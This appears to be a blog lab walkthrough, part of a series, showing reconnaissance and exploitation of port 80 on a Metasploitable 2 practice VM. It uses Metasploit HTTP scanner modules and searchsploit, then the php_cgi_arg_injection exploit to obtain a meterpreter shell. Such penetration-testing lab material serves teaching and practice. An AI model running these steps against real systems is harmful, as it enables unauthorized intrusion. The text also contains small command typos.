Metasploitable 2: Port 80

Welcome back to part IV in the Metasploitable 2 series. In part I we’ve configured our lab and scanned our target, in part II we’ve hacked port 21, in part III, enumerated users with port 25 and now it’s time to check port 80.

Port 80 is the default port for http services (web pages). In a previous scan we’ve determine that port 80 is open. It’s now time to determine what is running behind that port.

First do a nmap scan:

> db_namp -sV 192.168.231.109 -p 80

It’s Apache running in Ubuntu. Let’s try to gather some more info with an auxiliary scanner:

> use auxiliary/scanner/http/http_version

> show options

> run

It’s Apache 2.2.8 with PHP 5.2.4. We can navigate to ‘http://192.168.231.109/phpinfo.php’ and confirm the information already gathered:

Lets try other http modules to obtain more information about our server:

‘dir_listing’ will determine if directory listing is enabled:

> use auxiliary/scanner/http/dir_listing

> show options

> run

No luck. ‘dir_scanner’ will check for interesting directories:

> use auxiliary/scanner/http/dir_scanner

> show options

> run

We got 6 directories. Going through their content might give us an edge to hack our target. Lets try another module, ‘files_dir’:

> use auxiliary/scanner/http/files_dir

> show options

> run

Once again, these results might make a difference and we should take a look at them. Other module of interest id ‘options’, ‘robots_txt’ and ‘verb_auth_bypass’:

> use auxiliary/scanner/http/verb_auth_bypass

> show options

> run

And many more modules that I urge you to try.

Lets make use of the information we gathered.

Let’s search exploitDB for Apache with the version of PHP:

$ searchsploit apache | grep 5.4.2

CGI Remote Code Execution found. Let’s exploit it:

> use exploit/multi/http/php_cgi_arg_injection

> set lhost

>run

We got a meterpreter shell!!

Conclusion

Port 80 is a good source of information and exploit as any other port. We’ll come back to this port for the web apps installed. In this article we got information about the services running and found an exploit that gave us a shell.